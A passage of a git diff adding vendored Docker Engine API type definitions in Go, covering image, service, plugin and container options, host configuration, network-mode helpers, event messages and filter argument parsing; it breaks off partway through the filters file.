map[string]*string + AuthConfigs map[string]AuthConfig + Context io.Reader + Labels map[string]string + // squash the resulting image's layers to the parent + // preserves the original image and creates a new one from the parent with all + // the changes applied to a single layer + Squash bool + // CacheFrom specifies images that are used for matching cache. Images + // specified here do not need to have a valid parent chain to match cache. + CacheFrom []string + SecurityOpt []string +} + +// ImageBuildResponse holds information +// returned by a server after building +// an image. +type ImageBuildResponse struct { + Body io.ReadCloser + OSType string +} + +// ImageCreateOptions holds information to create images. +type ImageCreateOptions struct { + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry +} + +// ImageImportSource holds source information for ImageImport +type ImageImportSource struct { + Source io.Reader // Source is the data to send to the server to create this image from (mutually exclusive with SourceName) + SourceName string // SourceName is the name of the image to pull (mutually exclusive with Source) +} + +// ImageImportOptions holds information to import images from the client host. +type ImageImportOptions struct { + Tag string // Tag is the name to tag this image with. This attribute is deprecated. + Message string // Message is the message to tag the image with + Changes []string // Changes are the raw changes to apply to this image +} + +// ImageListOptions holds parameters to filter the list of images with. +type ImageListOptions struct { + All bool + Filters filters.Args +} + +// ImageLoadResponse returns information to the client about a load process. +type ImageLoadResponse struct { + // Body must be closed to avoid a resource leak + Body io.ReadCloser + JSON bool +} + +// ImagePullOptions holds information to pull images. +type ImagePullOptions struct { + All bool + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry + PrivilegeFunc RequestPrivilegeFunc +} + +// RequestPrivilegeFunc is a function interface that +// clients can supply to retry operations after +// getting an authorization error. +// This function returns the registry authentication +// header value in base 64 format, or an error +// if the privilege request fails. +type RequestPrivilegeFunc func() (string, error) + +//ImagePushOptions holds information to push images. +type ImagePushOptions ImagePullOptions + +// ImageRemoveOptions holds parameters to remove images. +type ImageRemoveOptions struct { + Force bool + PruneChildren bool +} + +// ImageSearchOptions holds parameters to search images with. +type ImageSearchOptions struct { + RegistryAuth string + PrivilegeFunc RequestPrivilegeFunc + Filters filters.Args + Limit int +} + +// ResizeOptions holds parameters to resize a tty. +// It can be used to resize container ttys and +// exec process ttys too. +type ResizeOptions struct { + Height uint + Width uint +} + +// VersionResponse holds version information for the client and the server +type VersionResponse struct { + Client *Version + Server *Version +} + +// ServerOK returns true when the client could connect to the docker server +// and parse the information received. It returns false otherwise. +func (v VersionResponse) ServerOK() bool { + return v.Server != nil +} + +// NodeListOptions holds parameters to list nodes with. +type NodeListOptions struct { + Filters filters.Args +} + +// NodeRemoveOptions holds parameters to remove nodes with. +type NodeRemoveOptions struct { + Force bool +} + +// ServiceCreateOptions contains the options to use when creating a service. +type ServiceCreateOptions struct { + // EncodedRegistryAuth is the encoded registry authorization credentials to + // use when updating the service. + // + // This field follows the format of the X-Registry-Auth header. + EncodedRegistryAuth string +} + +// ServiceCreateResponse contains the information returned to a client +// on the creation of a new service. +type ServiceCreateResponse struct { + // ID is the ID of the created service. + ID string + // Warnings is a set of non-fatal warning messages to pass on to the user. + Warnings []string `json:",omitempty"` +} + +// Values for RegistryAuthFrom in ServiceUpdateOptions +const ( + RegistryAuthFromSpec = "spec" + RegistryAuthFromPreviousSpec = "previous-spec" +) + +// ServiceUpdateOptions contains the options to be used for updating services. +type ServiceUpdateOptions struct { + // EncodedRegistryAuth is the encoded registry authorization credentials to + // use when updating the service. + // + // This field follows the format of the X-Registry-Auth header. + EncodedRegistryAuth string + + // TODO(stevvooe): Consider moving the version parameter of ServiceUpdate + // into this field. While it does open API users up to racy writes, most + // users may not need that level of consistency in practice. + + // RegistryAuthFrom specifies where to find the registry authorization + // credentials if they are not given in EncodedRegistryAuth. Valid + // values are "spec" and "previous-spec". + RegistryAuthFrom string +} + +// ServiceListOptions holds parameters to list services with. +type ServiceListOptions struct { + Filters filters.Args +} + +// TaskListOptions holds parameters to list tasks with. +type TaskListOptions struct { + Filters filters.Args +} + +// PluginRemoveOptions holds parameters to remove plugins. +type PluginRemoveOptions struct { + Force bool +} + +// PluginEnableOptions holds parameters to enable plugins. +type PluginEnableOptions struct { + Timeout int +} + +// PluginDisableOptions holds parameters to disable plugins. +type PluginDisableOptions struct { + Force bool +} + +// PluginInstallOptions holds parameters to install a plugin. +type PluginInstallOptions struct { + Disabled bool + AcceptAllPermissions bool + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry + RemoteRef string // RemoteRef is the plugin name on the registry + PrivilegeFunc RequestPrivilegeFunc + AcceptPermissionsFunc func(PluginPrivileges) (bool, error) + Args []string +} + +// SecretRequestOption is a type for requesting secrets +type SecretRequestOption struct { + Source string + Target string + UID string + GID string + Mode os.FileMode +} + +// SwarmUnlockKeyResponse contains the response for Engine API: +// GET /swarm/unlockkey +type SwarmUnlockKeyResponse struct { + // UnlockKey is the unlock key in ASCII-armored format. + UnlockKey string +} + +// PluginCreateOptions hold all options to plugin create. +type PluginCreateOptions struct { + RepoName string +} diff --git a/vendor/github.com/docker/docker/api/types/configs.go b/vendor/github.com/docker/docker/api/types/configs.go new file mode 100644 index 0000000000..20c19f2132 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/configs.go @@ -0,0 +1,69 @@ +package types + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" +) + +// configs holds structs used for internal communication between the +// frontend (such as an http server) and the backend (such as the +// docker daemon). + +// ContainerCreateConfig is the parameter set to ContainerCreate() +type ContainerCreateConfig struct { + Name string + Config *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig + AdjustCPUShares bool +} + +// ContainerRmConfig holds arguments for the container remove +// operation. This struct is used to tell the backend what operations +// to perform. +type ContainerRmConfig struct { + ForceRemove, RemoveVolume, RemoveLink bool +} + +// ContainerCommitConfig contains build configs for commit operation, +// and is used when making a commit with the current state of the container. +type ContainerCommitConfig struct { + Pause bool + Repo string + Tag string + Author string + Comment string + // merge container config into commit config before commit + MergeConfigs bool + Config *container.Config +} + +// ExecConfig is a small subset of the Config struct that holds the configuration +// for the exec feature of docker. +type ExecConfig struct { + User string // User that will run the command + Privileged bool // Is the container in privileged mode + Tty bool // Attach standard streams to a tty. + AttachStdin bool // Attach the standard input, makes possible user interaction + AttachStderr bool // Attach the standard error + AttachStdout bool // Attach the standard output + Detach bool // Execute in detach mode + DetachKeys string // Escape keys for detach + Env []string // Environment variables + Cmd []string // Execution commands and args +} + +// PluginRmConfig holds arguments for plugin remove. +type PluginRmConfig struct { + ForceRemove bool +} + +// PluginEnableConfig holds arguments for plugin enable +type PluginEnableConfig struct { + Timeout int +} + +// PluginDisableConfig holds arguments for plugin disable. +type PluginDisableConfig struct { + ForceDisable bool +} diff --git a/vendor/github.com/docker/docker/api/types/container/config.go b/vendor/github.com/docker/docker/api/types/container/config.go new file mode 100644 index 0000000000..fc050e5dba --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/config.go @@ -0,0 +1,62 @@ +package container + +import ( + "time" + + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// HealthConfig holds configuration settings for the HEALTHCHECK feature. +type HealthConfig struct { + // Test is the test to perform to check that the container is healthy. + // An empty slice means to inherit the default. + // The options are: + // {} : inherit healthcheck + // {"NONE"} : disable healthcheck + // {"CMD", args...} : exec arguments directly + // {"CMD-SHELL", command} : run command with system's default shell + Test []string `json:",omitempty"` + + // Zero means to inherit. Durations are expressed as integer nanoseconds. + Interval time.Duration `json:",omitempty"` // Interval is the time to wait between checks. + Timeout time.Duration `json:",omitempty"` // Timeout is the time to wait before considering the check to have hung. + + // Retries is the number of consecutive failures needed to consider a container as unhealthy. + // Zero means inherit. + Retries int `json:",omitempty"` +} + +// Config contains the configuration data about a container. +// It should hold only portable information about the container. +// Here, "portable" means "independent from the host we are running on". +// Non-portable information *should* appear in HostConfig. +// All fields added to this struct must be marked `omitempty` to keep getting +// predictable hashes from the old `v1Compatibility` configuration. +type Config struct { + Hostname string // Hostname + Domainname string // Domainname + User string // User that will run the command(s) inside the container, also support user:group + AttachStdin bool // Attach the standard input, makes possible user interaction + AttachStdout bool // Attach the standard output + AttachStderr bool // Attach the standard error + ExposedPorts nat.PortSet `json:",omitempty"` // List of exposed ports + Tty bool // Attach standard streams to a tty, including stdin if it is not closed. + OpenStdin bool // Open stdin + StdinOnce bool // If true, close stdin after the 1 attached client disconnects. + Env []string // List of environment variable to set in the container + Cmd strslice.StrSlice // Command to run when starting the container + Healthcheck *HealthConfig `json:",omitempty"` // Healthcheck describes how to check the container is healthy + ArgsEscaped bool `json:",omitempty"` // True if command is already escaped (Windows specific) + Image string // Name of the image as it was passed by the operator (e.g. could be symbolic) + Volumes map[string]struct{} // List of volumes (mounts) used for the container + WorkingDir string // Current directory (PWD) in the command will be launched + Entrypoint strslice.StrSlice // Entrypoint to run when starting the container + NetworkDisabled bool `json:",omitempty"` // Is network disabled + MacAddress string `json:",omitempty"` // Mac Address of the container + OnBuild []string // ONBUILD metadata that were defined on the image Dockerfile + Labels map[string]string // List of labels set to this container + StopSignal string `json:",omitempty"` // Signal to stop a container + StopTimeout *int `json:",omitempty"` // Timeout (in seconds) to stop a container + Shell strslice.StrSlice `json:",omitempty"` // Shell for shell-form of RUN, CMD, ENTRYPOINT +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_create.go b/vendor/github.com/docker/docker/api/types/container/container_create.go new file mode 100644 index 0000000000..d028e3b121 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/container_create.go @@ -0,0 +1,21 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerCreateCreatedBody container create created body +// swagger:model ContainerCreateCreatedBody +type ContainerCreateCreatedBody struct { + + // The ID of the created container + // Required: true + ID string `json:"Id"` + + // Warnings encountered when creating the container + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_update.go b/vendor/github.com/docker/docker/api/types/container/container_update.go new file mode 100644 index 0000000000..81ee12c678 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/container_update.go @@ -0,0 +1,17 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerUpdateOKBody container update o k body +// swagger:model ContainerUpdateOKBody +type ContainerUpdateOKBody struct { + + // warnings + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_wait.go b/vendor/github.com/docker/docker/api/types/container/container_wait.go new file mode 100644 index 0000000000..16cf335321 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/container_wait.go @@ -0,0 +1,17 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerWaitOKBody container wait o k body +// swagger:model ContainerWaitOKBody +type ContainerWaitOKBody struct { + + // Exit code of the container + // Required: true + StatusCode int64 `json:"StatusCode"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/host_config.go b/vendor/github.com/docker/docker/api/types/container/host_config.go new file mode 100644 index 0000000000..0c82d625e8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/host_config.go @@ -0,0 +1,333 @@ +package container + +import ( + "strings" + + "github.com/docker/docker/api/types/blkiodev" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" + "github.com/docker/go-units" +) + +// NetworkMode represents the container network stack. +type NetworkMode string + +// Isolation represents the isolation technology of a container. The supported +// values are platform specific +type Isolation string + +// IsDefault indicates the default isolation technology of a container. On Linux this +// is the native driver. On Windows, this is a Windows Server Container. +func (i Isolation) IsDefault() bool { + return strings.ToLower(string(i)) == "default" || string(i) == "" +} + +// IpcMode represents the container ipc stack. +type IpcMode string + +// IsPrivate indicates whether the container uses its private ipc stack. +func (n IpcMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsHost indicates whether the container uses the host's ipc stack. +func (n IpcMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether the container uses a container's ipc stack. +func (n IpcMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the ipc stack is valid. +func (n IpcMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + case "container": + if len(parts) != 2 || parts[1] == "" { + return false + } + default: + return false + } + return true +} + +// Container returns the name of the container ipc stack is going to be used. +func (n IpcMode) Container() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// UsernsMode represents userns mode in the container. +type UsernsMode string + +// IsHost indicates whether the container uses the host's userns. +func (n UsernsMode) IsHost() bool { + return n == "host" +} + +// IsPrivate indicates whether the container uses the a private userns. +func (n UsernsMode) IsPrivate() bool { + return !(n.IsHost()) +} + +// Valid indicates whether the userns is valid. +func (n UsernsMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + default: + return false + } + return true +} + +// CgroupSpec represents the cgroup to use for the container. +type CgroupSpec string + +// IsContainer indicates whether the container is using another container cgroup +func (c CgroupSpec) IsContainer() bool { + parts := strings.SplitN(string(c), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the cgroup spec is valid. +func (c CgroupSpec) Valid() bool { + return c.IsContainer() || c == "" +} + +// Container returns the name of the container whose cgroup will be used. +func (c CgroupSpec) Container() string { + parts := strings.SplitN(string(c), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// UTSMode represents the UTS namespace of the container. +type UTSMode string + +// IsPrivate indicates whether the container uses its private UTS namespace. +func (n UTSMode) IsPrivate() bool { + return !(n.IsHost()) +} + +// IsHost indicates whether the container uses the host's UTS namespace. +func (n UTSMode) IsHost() bool { + return n == "host" +} + +// Valid indicates whether the UTS namespace is valid. +func (n UTSMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + default: + return false + } + return true +} + +// PidMode represents the pid namespace of the container. +type PidMode string + +// IsPrivate indicates whether the container uses its own new pid namespace. +func (n PidMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsHost indicates whether the container uses the host's pid namespace. +func (n PidMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether the container uses a container's pid namespace. +func (n PidMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the pid namespace is valid. +func (n PidMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + case "container": + if len(parts) != 2 || parts[1] == "" { + return false + } + default: + return false + } + return true +} + +// Container returns the name of the container whose pid namespace is going to be used. +func (n PidMode) Container() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// DeviceMapping represents the device mapping between the host and the container. +type DeviceMapping struct { + PathOnHost string + PathInContainer string + CgroupPermissions string +} + +// RestartPolicy represents the restart policies of the container. +type RestartPolicy struct { + Name string + MaximumRetryCount int +} + +// IsNone indicates whether the container has the "no" restart policy. +// This means the container will not automatically restart when exiting. +func (rp *RestartPolicy) IsNone() bool { + return rp.Name == "no" || rp.Name == "" +} + +// IsAlways indicates whether the container has the "always" restart policy. +// This means the container will automatically restart regardless of the exit status. +func (rp *RestartPolicy) IsAlways() bool { + return rp.Name == "always" +} + +// IsOnFailure indicates whether the container has the "on-failure" restart policy. +// This means the container will automatically restart of exiting with a non-zero exit status. +func (rp *RestartPolicy) IsOnFailure() bool { + return rp.Name == "on-failure" +} + +// IsUnlessStopped indicates whether the container has the +// "unless-stopped" restart policy. This means the container will +// automatically restart unless user has put it to stopped state. +func (rp *RestartPolicy) IsUnlessStopped() bool { + return rp.Name == "unless-stopped" +} + +// IsSame compares two RestartPolicy to see if they are the same +func (rp *RestartPolicy) IsSame(tp *RestartPolicy) bool { + return rp.Name == tp.Name && rp.MaximumRetryCount == tp.MaximumRetryCount +} + +// LogConfig represents the logging configuration of the container. +type LogConfig struct { + Type string + Config map[string]string +} + +// Resources contains container's resources (cgroups config, ulimits...) +type Resources struct { + // Applicable to all platforms + CPUShares int64 `json:"CpuShares"` // CPU shares (relative weight vs. other containers) + Memory int64 // Memory limit (in bytes) + NanoCPUs int64 `json:"NanoCpus"` // CPU quota in units of 10-9 CPUs. + + // Applicable to UNIX platforms + CgroupParent string // Parent cgroup. + BlkioWeight uint16 // Block IO weight (relative weight vs. other containers) + BlkioWeightDevice []*blkiodev.WeightDevice + BlkioDeviceReadBps []*blkiodev.ThrottleDevice + BlkioDeviceWriteBps []*blkiodev.ThrottleDevice + BlkioDeviceReadIOps []*blkiodev.ThrottleDevice + BlkioDeviceWriteIOps []*blkiodev.ThrottleDevice + CPUPeriod int64 `json:"CpuPeriod"` // CPU CFS (Completely Fair Scheduler) period + CPUQuota int64 `json:"CpuQuota"` // CPU CFS (Completely Fair Scheduler) quota + CPURealtimePeriod int64 `json:"CpuRealtimePeriod"` // CPU real-time period + CPURealtimeRuntime int64 `json:"CpuRealtimeRuntime"` // CPU real-time runtime + CpusetCpus string // CpusetCpus 0-2, 0,1 + CpusetMems string // CpusetMems 0-2, 0,1 + Devices []DeviceMapping // List of devices to map inside the container + DiskQuota int64 // Disk limit (in bytes) + KernelMemory int64 // Kernel memory limit (in bytes) + MemoryReservation int64 // Memory soft limit (in bytes) + MemorySwap int64 // Total memory usage (memory + swap); set `-1` to enable unlimited swap + MemorySwappiness *int64 // Tuning container memory swappiness behaviour + OomKillDisable *bool // Whether to disable OOM Killer or not + PidsLimit int64 // Setting pids limit for a container + Ulimits []*units.Ulimit // List of ulimits to be set in the container + + // Applicable to Windows + CPUCount int64 `json:"CpuCount"` // CPU count + CPUPercent int64 `json:"CpuPercent"` // CPU percent + IOMaximumIOps uint64 // Maximum IOps for the container system drive + IOMaximumBandwidth uint64 // Maximum IO in bytes per second for the container system drive +} + +// UpdateConfig holds the mutable attributes of a Container. +// Those attributes can be updated at runtime. +type UpdateConfig struct { + // Contains container's resources (cgroups, ulimits) + Resources + RestartPolicy RestartPolicy +} + +// HostConfig the non-portable Config structure of a container. +// Here, "non-portable" means "dependent of the host we are running on". +// Portable information *should* appear in Config. +type HostConfig struct { + // Applicable to all platforms + Binds []string // List of volume bindings for this container + ContainerIDFile string // File (path) where the containerId is written + LogConfig LogConfig // Configuration of the logs for this container + NetworkMode NetworkMode // Network mode to use for the container + PortBindings nat.PortMap // Port mapping between the exposed port (container) and the host + RestartPolicy RestartPolicy // Restart policy to be used for the container + AutoRemove bool // Automatically remove container when it exits + VolumeDriver string // Name of the volume driver used to mount volumes + VolumesFrom []string // List of volumes to take from other container + + // Applicable to UNIX platforms + CapAdd strslice.StrSlice // List of kernel capabilities to add to the container + CapDrop strslice.StrSlice // List of kernel capabilities to remove from the container + DNS []string `json:"Dns"` // List of DNS server to lookup + DNSOptions []string `json:"DnsOptions"` // List of DNSOption to look for + DNSSearch []string `json:"DnsSearch"` // List of DNSSearch to look for + ExtraHosts []string // List of extra hosts + GroupAdd []string // List of additional groups that the container process will run as + IpcMode IpcMode // IPC namespace to use for the container + Cgroup CgroupSpec // Cgroup to use for the container + Links []string // List of links (in the name:alias form) + OomScoreAdj int // Container preference for OOM-killing + PidMode PidMode // PID namespace to use for the container + Privileged bool // Is the container in privileged mode + PublishAllPorts bool // Should docker publish all exposed port for the container + ReadonlyRootfs bool // Is the container root filesystem in read-only + SecurityOpt []string // List of string values to customize labels for MLS systems, such as SELinux. + StorageOpt map[string]string `json:",omitempty"` // Storage driver options per container. + Tmpfs map[string]string `json:",omitempty"` // List of tmpfs (mounts) used for the container + UTSMode UTSMode // UTS namespace to use for the container + UsernsMode UsernsMode // The user namespace to use for the container + ShmSize int64 // Total shm memory usage + Sysctls map[string]string `json:",omitempty"` // List of Namespaced sysctls used for the container + Runtime string `json:",omitempty"` // Runtime to use with this container + + // Applicable to Windows + ConsoleSize [2]uint // Initial console size (height,width) + Isolation Isolation // Isolation technology of the container (eg default, hyperv) + + // Contains container's resources (cgroups, ulimits) + Resources + + // Mounts specs used by the container + Mounts []mount.Mount `json:",omitempty"` + + // Run a custom init inside the container, if null, use the daemon's configured settings + Init *bool `json:",omitempty"` + + // Custom init path + InitPath string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go new file mode 100644 index 0000000000..9fb79bed6f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go @@ -0,0 +1,81 @@ +// +build !windows + +package container + +import "strings" + +// IsValid indicates if an isolation technology is valid +func (i Isolation) IsValid() bool { + return i.IsDefault() +} + +// IsPrivate indicates whether container uses its private network stack. +func (n NetworkMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsDefault indicates whether container uses the default network stack. +func (n NetworkMode) IsDefault() bool { + return n == "default" +} + +// NetworkName returns the name of the network stack. +func (n NetworkMode) NetworkName() string { + if n.IsBridge() { + return "bridge" + } else if n.IsHost() { + return "host" + } else if n.IsContainer() { + return "container" + } else if n.IsNone() { + return "none" + } else if n.IsDefault() { + return "default" + } else if n.IsUserDefined() { + return n.UserDefined() + } + return "" +} + +// IsBridge indicates whether container uses the bridge network stack +func (n NetworkMode) IsBridge() bool { + return n == "bridge" +} + +// IsHost indicates whether container uses the host network stack. +func (n NetworkMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether container uses a container network stack. +func (n NetworkMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// IsNone indicates whether container isn't using a network stack. +func (n NetworkMode) IsNone() bool { + return n == "none" +} + +// ConnectedContainer is the id of the container which network this container is connected to. +func (n NetworkMode) ConnectedContainer() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// IsUserDefined indicates user-created network +func (n NetworkMode) IsUserDefined() bool { + return !n.IsDefault() && !n.IsBridge() && !n.IsHost() && !n.IsNone() && !n.IsContainer() +} + +//UserDefined indicates user-created network +func (n NetworkMode) UserDefined() string { + if n.IsUserDefined() { + return string(n) + } + return "" +} diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go new file mode 100644 index 0000000000..0ee332ba68 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go @@ -0,0 +1,87 @@ +package container + +import ( + "strings" +) + +// IsDefault indicates whether container uses the default network stack. +func (n NetworkMode) IsDefault() bool { + return n == "default" +} + +// IsNone indicates whether container isn't using a network stack. +func (n NetworkMode) IsNone() bool { + return n == "none" +} + +// IsContainer indicates whether container uses a container network stack. +// Returns false as windows doesn't support this mode +func (n NetworkMode) IsContainer() bool { + return false +} + +// IsBridge indicates whether container uses the bridge network stack +// in windows it is given the name NAT +func (n NetworkMode) IsBridge() bool { + return n == "nat" +} + +// IsHost indicates whether container uses the host network stack. +// returns false as this is not supported by windows +func (n NetworkMode) IsHost() bool { + return false +} + +// IsPrivate indicates whether container uses its private network stack. +func (n NetworkMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// ConnectedContainer is the id of the container which network this container is connected to. +// Returns blank string on windows +func (n NetworkMode) ConnectedContainer() string { + return "" +} + +// IsUserDefined indicates user-created network +func (n NetworkMode) IsUserDefined() bool { + return !n.IsDefault() && !n.IsNone() && !n.IsBridge() +} + +// IsHyperV indicates the use of a Hyper-V partition for isolation +func (i Isolation) IsHyperV() bool { + return strings.ToLower(string(i)) == "hyperv" +} + +// IsProcess indicates the use of process isolation +func (i Isolation) IsProcess() bool { + return strings.ToLower(string(i)) == "process" +} + +// IsValid indicates if an isolation technology is valid +func (i Isolation) IsValid() bool { + return i.IsDefault() || i.IsHyperV() || i.IsProcess() +} + +// NetworkName returns the name of the network stack. +func (n NetworkMode) NetworkName() string { + if n.IsDefault() { + return "default" + } else if n.IsBridge() { + return "nat" + } else if n.IsNone() { + return "none" + } else if n.IsUserDefined() { + return n.UserDefined() + } + + return "" +} + +//UserDefined indicates user-created network +func (n NetworkMode) UserDefined() string { + if n.IsUserDefined() { + return string(n) + } + return "" +} diff --git a/vendor/github.com/docker/docker/api/types/error_response.go b/vendor/github.com/docker/docker/api/types/error_response.go new file mode 100644 index 0000000000..dc942d9d9e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/error_response.go @@ -0,0 +1,13 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ErrorResponse Represents an error. +// swagger:model ErrorResponse +type ErrorResponse struct { + + // The error message. + // Required: true + Message string `json:"message"` +} diff --git a/vendor/github.com/docker/docker/api/types/events/events.go b/vendor/github.com/docker/docker/api/types/events/events.go new file mode 100644 index 0000000000..7129a65acf --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/events/events.go @@ -0,0 +1,42 @@ +package events + +const ( + // ContainerEventType is the event type that containers generate + ContainerEventType = "container" + // DaemonEventType is the event type that daemon generate + DaemonEventType = "daemon" + // ImageEventType is the event type that images generate + ImageEventType = "image" + // NetworkEventType is the event type that networks generate + NetworkEventType = "network" + // PluginEventType is the event type that plugins generate + PluginEventType = "plugin" + // VolumeEventType is the event type that volumes generate + VolumeEventType = "volume" +) + +// Actor describes something that generates events, +// like a container, or a network, or a volume. +// It has a defined name and a set or attributes. +// The container attributes are its labels, other actors +// can generate these attributes from other properties. +type Actor struct { + ID string + Attributes map[string]string +} + +// Message represents the information an event contains +type Message struct { + // Deprecated information from JSONMessage. + // With data only in container events. + Status string `json:"status,omitempty"` + ID string `json:"id,omitempty"` + From string `json:"from,omitempty"` + + Type string + Action string + Actor Actor + + Time int64 `json:"time,omitempty"` + TimeNano int64 `json:"timeNano,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/filters/parse.go b/vendor/github.com/docker/docker/api/types/filters/parse.go new file mode 100644 index 0000000000..e01a41deb8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/filters/parse.go @@ -0,0 +1,310 @@ +// Package filters provides helper function to parse and handle command line +// filter, used for example in docker ps or docker images commands. +package filters + +import ( + "encoding/json" + "errors" + "fmt" + "regexp" + "strings" + + "github.com/docker/docker/api/types/versions" +) + +// Args stores filter arguments as map key:{map key: bool}. +// It contains an aggregation of the map of arguments (which are in the form +// of -f 'key=value') based on the key, and stores values for the same key +// in a map with string keys and boolean values. +// e.g given -f 'label=label1=1' -f 'label=label2=2' -f 'image.name=ubuntu' +// the args will be {"image.name":{"ubuntu":true},"label":{"label1=1":true,"label2=2":true}} +type Args struct { + fields map[string]map[string]bool +} + +// NewArgs initializes a new Args struct. +func NewArgs() Args { + return Args{fields: map[string]map[string]bool{}} +} + +// ParseFlag parses the argument to the filter flag. Like +// +// `docker ps -f 'created=today' -f 'image.name=ubuntu*'` +// +// If prev map is provided, then it is appended to, and returned. By default a new +// map is created. +func ParseFlag(arg string, prev Args) (Args, error) { + filters := prev + if len(arg) == 0 { + return filters, nil + } + + if !strings.Contains(arg, "=") { + return filters, ErrBadFormat + } + + f := strings.SplitN(arg, "=", 2) + + name := strings.ToLower(strings.TrimSpace(f[0])) + value := strings.TrimSpace(f[1]) + + filters.Add(name, value) + + return filters, nil +} + +// ErrBadFormat is an error returned in case of bad format for a filter. +var ErrBadFormat = errors.New("bad format of filter (expected name=value)") + +// ToParam packs the Args into a string for easy transport from client to server. +func ToParam(a Args) (string, error) { + // this way we don't URL encode {}, just empty space + if a.Len() == 0 { + return "", nil + } + + buf, err := json.Marshal(a.fields) + if err != nil { + return "", err + } + return string(buf), nil +} + +// ToParamWithVersion packs the Args into a string for easy transport from client to server. +// The generated string will depend on the specified version (corresponding to the API version). +func ToParamWithVersion(version string, a Args) (string, error) { + // this way we don't URL encode {}, just empty space + if a.Len() == 0 { + return "", nil + } + + // for daemons older than v1.10, filter must be of the form map[string][]string + buf := []byte{} + err := errors.New("") + if version != "" && versions.LessThan(version, "1.22") { + buf, err = json.Marshal(convertArgsToSlice(a.fields)) + } else { + buf, err = json.Marshal(a.fields) + } + if err != nil { + return "", err + } + return string(buf), nil +} + +// FromParam unpacks the filter Args. +func FromParam(p string) (Args, error) { + if len(p) == 0 { + return NewArgs(), nil + } + + r := strings.NewReader(p) + d := json.NewDecoder(r) + + m := map[string]map[string]bool{} + if err := d.Decode(&m); err != nil { + r.Seek(0, 0) + + // Allow parsing old arguments in slice format. + // Because other libraries might be sending them in this format. + deprecated := map[string][]string{} + if deprecatedErr := d.Decode(&deprecated); deprecatedErr == nil { + m = deprecatedArgs(deprecated) + } else { + return NewArgs(), err + } + } + return Args{m}, nil +} + +// Get returns the list of values associates with a field. +// It returns a slice of strings to keep backwards compatibility with old code. +func (filters Args) Get(field string) []string { + values := filters.fields[field] + if values == nil { + return make([]string, 0) + } + slice := make([]string, 0, len(values)) + for key := range values { + slice = append(slice, key) + } + return slice +} + +// Add adds a new value to a filter field. +func (filters Args) Add(name, value string) { + if _, ok := filters.fields[name]; ok { + filters.fields[name][value] = true + } else { + filters.fields[name] = map[string]bool{value: true} + } +} + +// Del removes a value from a filter field. +func (filters Args) Del(name, value string) { + if _, ok := filters.fields[name]; ok { + delete(filters.fields[name], value) + if len(filters.fields[name]) == 0 { + delete(filters.fields, name) + } + } +} + +// Len returns the number of fields in the arguments. +func (filters Args) Len() int { + return 